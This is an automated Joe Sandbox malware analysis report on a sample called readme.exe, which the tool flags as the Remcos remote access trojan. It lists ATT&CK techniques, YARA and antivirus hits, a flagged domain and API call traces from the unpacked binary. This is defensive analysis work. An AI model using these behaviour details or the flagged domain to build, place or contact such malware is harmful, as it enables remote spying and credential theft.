Loading ...

Play interactive tourEdit tour

Analysis Report readme.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:228452
Start date:07.05.2020
Start time:22:19:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:readme.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:36
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@58/25@7/2
EGA Information:
  • Successful, ratio: 57.1%
HDC Information:
  • Successful, ratio: 35.9% (good quality ratio 29.9%)
  • Quality average: 69.5%
  • Quality standard deviation: 37.3%
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 112
  • Number of non-executed functions: 265
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 172.217.18.14, 172.217.18.110, 23.210.248.85, 205.185.216.10, 205.185.216.42, 23.37.58.89
  • Excluded domains from analysis (whitelisted): docs.google.com, fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, e5684.g.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, drive.google.com, prod.fs.microsoft.com.akadns.net
  • Execution Graph export aborted for target mshta.exe, PID 4184 because there are no executed function
  • Execution Graph export aborted for target mshta.exe, PID 764 because there are no executed function
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Remcos
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsPowerShell1Registry Run Keys / Startup Folder1Access Token Manipulation1Software Packing11Credential Dumping1System Time Discovery1Remote File Copy21Screen Capture1Data Encrypted1Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Replication Through Removable MediaScripting112Scheduled Task1Process Injection622Deobfuscate/Decode Files or Information1Credentials in Files2Account Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumRemote File Copy21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
External Remote ServicesExecution through API1Modify Existing Service1Scheduled Task1Scripting112Input Capture221Security Software Discovery21Windows Remote ManagementInput Capture221Automated ExfiltrationStandard Cryptographic Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseGraphical User Interface11Application Shimming1Application Shimming1File Deletion1Credentials in FilesSystem Service Discovery1Logon ScriptsClipboard Data2Data EncryptedRemote Access Tools1SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line Interface11New Service1New Service1Obfuscated Files or Information3Account ManipulationFile and Directory Discovery3Shared WebrootData StagedScheduled TransferStandard Non-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkService Execution2Modify Existing ServiceNew ServiceMasquerading331Brute ForceSystem Information Discovery45Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScheduled Task1Path InterceptionScheduled TaskModify Registry1Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionVirtualization/Sandbox Evasion2Bash HistoryProcess Discovery3Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessAccess Token Manipulation1Input PromptApplication Window Discovery11Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationTimestomp1KeychainSystem Owner/User Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsProcess Injection622Private KeysRemote System Discovery1Replication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe
Masquerade as Legitimate ApplicationRegsvr32New ServiceBypass User Account ControlDLL Side-Loading1Securityd MemoryPermission Groups DiscoveryPass the TicketMan in the BrowserAlternate Network MediumsCustom Command and Control ProtocolDisk Content Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: u864246.nvpn.soVirustotal: Detection: 13%Perma Link
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 4880, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 3944, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 2272, type: MEMORY
Source: Yara matchFile source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 20.2.ieinstal.exe.10530000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 29.2.Htdrset.exe.10530000.7.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 34.2.ieinstal.exe.10530000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 21.2.Htdrset.exe.10530000.7.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 0.2.readme.exe.10530000.7.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 33.2.ieinstal.exe.10530000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 34.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
Source: 33.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
Source: 20.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t20_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA20_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_10538C57 getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,20_2_10538C57
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_10541D28 FindFirstFileW,20_2_10541D28
